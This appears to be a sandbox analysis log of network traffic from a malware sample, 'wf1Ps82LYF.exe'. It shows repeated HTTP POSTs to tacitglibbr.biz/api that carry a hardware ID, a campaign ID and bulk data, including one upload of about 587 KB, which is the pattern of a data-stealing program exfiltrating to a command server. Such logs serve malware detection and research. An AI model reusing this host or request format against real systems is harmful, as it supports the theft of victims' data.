                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 33 37 72 38 6a 2b 58 4c 38 38 31 4c 41 58 58 6d 54 2f 36 73 6f 38 2b 6c 41 79 74 30 45 50 6c 32 36 67 46 72 6f 38 75 62 6c 74 44 2f 39 76 7a 36 30 50 37 72 6b 58 74 30 50 4b 49 58 73 74 32 2b 69 35 31 36 53 6d 6c 41 2b 4a 75 32 51 57 65 6e 35 39 75 43 6e 4f 65 32 39 49 66 31 34 2f 76 31 61 7a 45 74 30 6c 50 6d 6a 5a 4c 61 75 52 4e 32 5a 56 58 42 33 6f 74 59 65 72 2f 6e 6f 72 75 31 38 79 71 6b 74 2b 48 79 36 36 68 66 56 44 33 65 66 76 50 67 6f 73 61 64 43 30 70 64 61 65 6e 75 72 6e 46 58 76 39 66 50 68 73 54 72 76 76 53 37 2f 65 50 76 7a 58 4d 5a 45 64 70 37 2f 70 6d 37 39 35 77 66 56 68 52 77 6d 50 6f 32 4e 58 65 50 35 73 50 48 37 4a 61 75 31 49 72 51 70 75 76 35 56 79 45 68 77 6e 76 2b 6f 62 62 6d 6a 51 74 4b 56 54 6e 5a 2b 71 6f 52 43 37 2f 66 31 34 72
                                                                                                  Data Ascii: 37r8j+XL881LAXXmT/6so8+lAyt0EPl26gFro8ubltD/9vz60P7rkXt0PKIXst2+i516SmlA+Ju2QWen59uCnOe29If14/v1azEt0lPmjZLauRN2ZVXB3otYer/noru18yqkt+Hy66hfVD3efvPgosadC0pdaenurnFXv9fPhsTrvvS7/ePvzXMZEdp7/pm795wfVhRwmPo2NXeP5sPH7Jau1IrQpuv5VyEhwnv+obbmjQtKVTnZ+qoRC7/f14r
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 50 50 64 68 2b 66 70 49 38 67 38 6f 69 73 4c 67 59 36 75 75 56 39 47 4c 56 33 4e 79 76 4b 67 51 74 36 71 69 76 4f 64 75 75 61 31 75 36 30 36 30 74 56 69 4d 46 30 6d 4b 76 4c 59 6f 35 66 73 4a 6b 6f 38 63 4a 6a 37 71 6c 55 4c 39 2b 50 50 34 74 6e 76 56 6a 41 6e 69 65 2f 33 6c 58 74 74 41 4d 4e 32 38 72 79 6a 6c 6b 41 66 62 6d 6b 64 76 61 4b 43 47 56 36 2f 42 76 71 36 74 66 4c 50 79 47 2f 64 2f 39 50 4a 50 33 51 4a 58 68 66 61 6e 65 4c 71 2b 53 4a 4c 54 48 48 67 2b 39 63 55 65 72 2f 72 68 72 75 31 73 75 65 6c 37 70 79 61 71 70 30 61 43 56 6a 43 46 76 50 67 36 38 2b 6c 56 6b 73 55 63 4f 58 32 2f 68 46 62 73 36 50 4f 70 69 77 4c 4d 71 43 50 79 5a 75 76 4c 5a 38 74 56 66 5a 58 72 73 53 53 6f 71 6b 6e 63 6d 6b 6f 2b 4d 4f 32 5a 45 4c 66 48 73 4b 62 31 41 36 58
                                                                                                  Data Ascii: PPdh+fpI8g8oisLgY6uuV9GLV3NyvKgQt6qivOduua1u6060tViMF0mKvLYo5fsJko8cJj7qlUL9+PP4tnvVjAnie/3lXttAMN28ryjlkAfbmkdvaKCGV6/Bvq6tfLPyG/d/9PJP3QJXhfaneLq+SJLTHHg+9cUer/rhru1suel7pyaqp0aCVjCFvPg68+lVksUcOX2/hFbs6POpiwLMqCPyZuvLZ8tVfZXrsSSoqkncmko+MO2ZELfHsKb1A6X
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 71 2b 6d 44 70 77 64 62 39 33 6c 34 48 37 39 38 52 57 63 33 55 34 2b 4a 75 33 52 55 2f 33 73 39 75 32 6a 50 36 79 4d 45 4e 4e 2f 2f 66 52 50 33 46 68 2f 72 63 4b 31 61 37 4f 6e 51 4d 53 4d 48 44 41 2b 6f 74 59 49 31 72 36 34 72 6f 70 79 71 36 70 75 72 44 48 50 39 6c 66 43 53 47 61 43 73 59 64 6d 75 71 68 52 77 6f 70 54 50 6a 44 74 6b 42 43 33 72 4c 36 75 73 53 32 72 36 6e 36 6d 4b 71 2b 6d 44 70 77 64 62 39 33 6c 34 48 37 39 38 52 57 63 33 55 34 2b 4a 75 33 52 55 2f 33 73 39 75 32 6a 50 36 79 4d 45 4e 4e 2f 2f 66 52 50 33 46 68 2f 33 4e 4b 57 53 59 4f 58 55 74 47 54 55 6e 6c 6f 76 4e 59 65 72 2f 47 77 74 6f 78 38 6f 2f 49 52 75 6a 48 69 74 51 47 4d 65 6e 4f 64 38 71 64 2b 72 4f 52 67 33 4a 70 64 61 47 36 36 6d 52 2f 42 79 4e 47 75 2b 33 7a 74 38 6e 61 6d
                                                                                                  Data Ascii: q+mDpwdb93l4H798RWc3U4+Ju3RU/3s9u2jP6yMENN//fRP3Fh/rcK1a7OnQMSMHDA+otYI1r64ropyq6purDHP9lfCSGaCsYdmuqhRwopTPjDtkBC3rL6usS2r6n6mKq+mDpwdb93l4H798RWc3U4+Ju3RU/3s9u2jP6yMENN//fRP3Fh/3NKWSYOXUtGTUnlovNYer/Gwtox8o/IRujHitQGMenOd8qd+rORg3JpdaG66mR/ByNGu+3zt8nam
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 54 65 53 47 43 51 76 70 46 2b 76 71 6c 4a 31 64 30 53 50 6d 62 74 7a 68 44 43 37 50 66 2b 74 6e 79 6c 38 69 4b 30 4b 62 72 34 53 38 74 66 63 39 2f 37 75 6d 2f 39 74 67 6e 4c 33 55 6f 2b 4a 76 37 59 45 50 32 2b 71 4b 37 79 4d 75 61 7a 4c 66 70 79 36 4f 64 66 7a 31 6c 7a 31 4d 4b 65 52 61 2b 75 56 39 48 66 62 58 4e 36 75 34 4e 54 2f 2f 6e 4f 30 4a 67 75 37 4b 49 74 74 6c 33 39 2b 46 58 79 63 55 65 43 2b 37 41 71 6d 36 70 52 30 64 30 53 50 6d 62 74 7a 68 44 43 37 50 66 2b 74 6e 37 48 74 53 50 34 4d 65 57 37 51 49 78 5a 4d 4d 75 76 37 69 69 76 36 52 2b 53 32 6c 39 73 62 4b 75 56 52 75 79 35 7a 74 43 59 4c 75 79 69 4c 62 5a 41 39 2f 46 50 32 55 78 67 6c 4d 4b 65 52 61 2b 75 56 39 48 66 65 55 51 38 6e 49 42 54 37 2f 44 33 72 76 74 38 38 2f 4a 32 74 46 7a 6f 38
                                                                                                  Data Ascii: TeSGCQvpF+vqlJ1d0SPmbtzhDC7Pf+tnyl8iK0Kbr4S8tfc9/7um/9tgnL3Uo+Jv7YEP2+qK7yMuazLfpy6Odfz1lz1MKeRa+uV9HfbXN6u4NT//nO0Jgu7KIttl39+FXycUeC+7Aqm6pR0d0SPmbtzhDC7Pf+tn7HtSP4MeW7QIxZMMuv7iiv6R+S2l9sbKuVRuy5ztCYLuyiLbZA9/FP2UxglMKeRa+uV9HfeUQ8nIBT7/D3rvt88/J2tFzo8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.849708104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:06 UTC281OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=EF839D2LLWKORXY5BO
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 12846
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:06 UTC12846OUTData Raw: 2d 2d 45 46 38 33 39 44 32 4c 4c 57 4b 4f 52 58 59 35 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 46 38 33 39 44 32 4c 4c 57 4b 4f 52 58 59 35 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 46 38 33 39 44 32 4c 4c 57 4b 4f 52 58 59 35 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                  Data Ascii: --EF839D2LLWKORXY5BOContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--EF839D2LLWKORXY5BOContent-Disposition: form-data; name="pid"2--EF839D2LLWKORXY5BOContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                  2024-12-16 16:15:07 UTC1024INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:07 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=0rbkbk9mvi8j0n0j6booqcnf6r; expires=Fri, 11-Apr-2025 10:01:46 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BeMky%2FrS0hy%2F5C39xH%2FfiQDiWe1KSRpU%2FdMqhELY6J%2F87jdkjbGBIXraon1vTR1dNJkvBD0G2Zlo7KEt%2Fs3MMepj5tewcuh5Et%2Fqe%2FnmaDFaP7ybyS4I41Is6tE1MiyiRD0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff8632ec942d5-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1638&rtt_var=1195&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13785&delivery_rate=736815&cwnd=214&unsent_bytes=0&cid=693afc1e4675b397&ts=875&x=0"
                                                                                                  2024-12-16 16:15:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2024-12-16 16:15:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.849709104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:08 UTC275OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=2MMU31FEZ74B
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 15039
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:08 UTC15039OUTData Raw: 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 4d 4d 55 33 31 46 45 5a 37 34 42 0d 0a
                                                                                                  Data Ascii: --2MMU31FEZ74BContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--2MMU31FEZ74BContent-Disposition: form-data; name="pid"2--2MMU31FEZ74BContent-Disposition: form-data; name="lid"PsFKDg--pablo--2MMU31FEZ74B
                                                                                                  2024-12-16 16:15:09 UTC1017INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:09 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=0na6ku1as81t3a9thee7a0jvmq; expires=Fri, 11-Apr-2025 10:01:48 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Tgvetc5da2q46%2B2e45ry%2Faj1pbg30D4yBeKcLTuobeEuHZoGyu4UJHPhWLi0f%2FhaAN4QXUIl3CAjSa34mtPtf92yq9ZSzsylKnlWNq9OXbhYyrOvdx4iM%2BQBI7cHuRCF2Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff8713f8b42a0-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1617&rtt_var=619&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15972&delivery_rate=1751649&cwnd=222&unsent_bytes=0&cid=ad830d7ecd1ff94a&ts=864&x=0"
                                                                                                  2024-12-16 16:15:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2024-12-16 16:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.849710104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:11 UTC277OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=140DF29UV4GHED
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 20218
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:11 UTC15331OUTData Raw: 2d 2d 31 34 30 44 46 32 39 55 56 34 47 48 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 34 30 44 46 32 39 55 56 34 47 48 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 34 30 44 46 32 39 55 56 34 47 48 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 31 34 30 44 46 32 39 55
                                                                                                  Data Ascii: --140DF29UV4GHEDContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--140DF29UV4GHEDContent-Disposition: form-data; name="pid"3--140DF29UV4GHEDContent-Disposition: form-data; name="lid"PsFKDg--pablo--140DF29U
                                                                                                  2024-12-16 16:15:11 UTC4887OUTData Raw: 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                  2024-12-16 16:15:12 UTC1016INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:12 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=q31bbe8gjhp65bgrga7kqjrvrh; expires=Fri, 11-Apr-2025 10:01:51 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unIjK7FoJ7iHTKFXSSfYi%2B7gtUEepHgb3BUom0SQJgyo2iO2rJiSnvcJzP%2FuWhYcWi37ZUlmtEBSHZ72mL7hG8baOZM7pMIFf0yLtwZQDZYEnY6c8C9RQcsc%2FujUo4Tp4VE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff8829c07a252-YYZ
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14138&min_rtt=14133&rtt_var=5303&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21175&delivery_rate=206608&cwnd=32&unsent_bytes=0&cid=54a3a7bf245953b7&ts=957&x=0"
                                                                                                  2024-12-16 16:15:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2024-12-16 16:15:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.849711104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:14 UTC281OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=AIDRU3R1C98DTLM9H35
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 1249
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:14 UTC1249OUTData Raw: 2d 2d 41 49 44 52 55 33 52 31 43 39 38 44 54 4c 4d 39 48 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 49 44 52 55 33 52 31 43 39 38 44 54 4c 4d 39 48 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 49 44 52 55 33 52 31 43 39 38 44 54 4c 4d 39 48 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                  Data Ascii: --AIDRU3R1C98DTLM9H35Content-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--AIDRU3R1C98DTLM9H35Content-Disposition: form-data; name="pid"1--AIDRU3R1C98DTLM9H35Content-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                  2024-12-16 16:15:15 UTC1014INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=c3gnhhogns501r2pkkbn9ak4i2; expires=Fri, 11-Apr-2025 10:01:53 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNfzRRo6Ry4SoHzbWwJmopcVcy8cB7ERXgVze0AiYJzJa%2FsvdOXGvzyatkju16Z0UqVwakFJ%2BKMgWlpxo4A55j3b%2BD1a4uCEk0Kf2gX3AOg4vUiHCmra%2ByH7OETmksOX8ZU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff8932edd4276-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2369&min_rtt=2356&rtt_var=910&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2166&delivery_rate=1185546&cwnd=208&unsent_bytes=0&cid=dc06bc7933efdfe7&ts=798&x=0"
                                                                                                  2024-12-16 16:15:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2024-12-16 16:15:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.849712104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:16 UTC279OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=0EHZDQXPSN9Y7DE
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 587708
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 2d 2d 30 45 48 5a 44 51 58 50 53 4e 39 59 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 33 32 43 41 38 38 36 46 44 32 30 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 45 48 5a 44 51 58 50 53 4e 39 59 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 45 48 5a 44 51 58 50 53 4e 39 59 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 45 48 5a 44
                                                                                                  Data Ascii: --0EHZDQXPSN9Y7DEContent-Disposition: form-data; name="hwid"B732CA886FD20D98AC8923850305D13E--0EHZDQXPSN9Y7DEContent-Disposition: form-data; name="pid"1--0EHZDQXPSN9Y7DEContent-Disposition: form-data; name="lid"PsFKDg--pablo--0EHZD
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 23 28 26 37 bd bc 24 dd 8a a4 7a d6 22 82 bd 3b bd d8 f8 f0 a1 22 ca fd bd bb 6f 5f 24 5d ae 3d 41 4b 86 f9 8b 05 ba 94 fe f5 7e 71 96 62 1a a8 fe db 43 a1 61 c8 f9 d8 62 e7 88 eb d3 68 df 44 77 7a f8 ba 76 49 07 6b 31 1e e8 66 8c e6 2e 73 08 38 68 85 80 72 15 a4 44 99 e8 bb 0f 3d f2 d0 6b 29 ed ae 35 c3 67 a2 c8 f6 5d 39 4b 0e 28 f2 3c aa 3b 5e 99 e6 28 da 97 a4 c5 e3 5a 68 32 62 51 1c cf fa 3a 3d 2e ee 91 a3 a4 15 1b 00 fb fa a0 1a 37 cc b2 f1 aa 03 f9 a9 a9 6a 9c 95 0b c3 e1 98 bb dc bb 7a 4e a7 f9 a1 b8 fb e7 cd dd 51 b7 92 5a 25 d1 bd 04 95 a1 48 a4 2a 73 0d 56 dd 2c 00 c9 ff fb c2 03 c6 37 33 31 75 be 9d bc 5d 8c 2c c3 20 28 bb 92 33 34 70 97 d1 54 91 79 10 03 2f d6 96 f6 d4 52 17 bc bd b7 3e 48 f9 c1 02 4a cf af c9 39 96 ba 25 3d ad be d2 74 06 02
                                                                                                  Data Ascii: #(&7$z";"o_$]=AK~qbCabhDwzvIk1f.s8hrD=k)5g]9K(<;^(Zh2bQ:=.7jzNQZ%H*sV,731u], (34pTy/R>HJ9%=t
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: e3 d4 34 84 02 47 19 f9 45 18 38 47 ba d9 44 2f 89 fd 6d ac 35 4d b9 21 4b 69 99 c4 fb 42 0a c9 a9 aa d7 83 f8 bc f5 1f 18 eb cf a3 10 ad ec 73 3d 43 d6 d8 9e 5b a8 7f a6 a5 6c 24 3f 4e c3 44 ab 02 f3 75 bc 59 4e 00 c6 0e 9f e3 85 ed ad a2 4a fe 42 fa eb 19 43 59 f7 97 b2 af 97 91 12 ba 2c 37 14 c1 fd 67 f3 48 e9 06 98 05 90 ef a9 56 39 08 49 80 e6 71 ef 97 9c 74 3f 74 1a 1f d7 20 0e e6 15 57 e3 7b 44 08 5f 05 c5 ed e2 79 a6 56 27 49 e9 80 8c 8d 45 f4 79 0d 69 64 01 db d7 ef 13 16 f7 9e ea 66 b5 0f a3 bb ee 88 7b 73 6f d3 b7 5d 21 42 b2 08 78 18 18 7e cc 06 d3 e8 46 81 8d e2 f9 8d 6a 0b 3b 0c 1b f5 95 30 63 3a 27 b4 e2 f5 15 6e 2f 8f 4e 26 eb 8e 04 3e 18 0c 3c 7f f7 cf a5 5d 5b ee 19 ad 6c be 16 38 15 58 bf 3d a9 3c ac 1c b1 c4 c3 ea 32 11 f8 f0 9f f5 2b
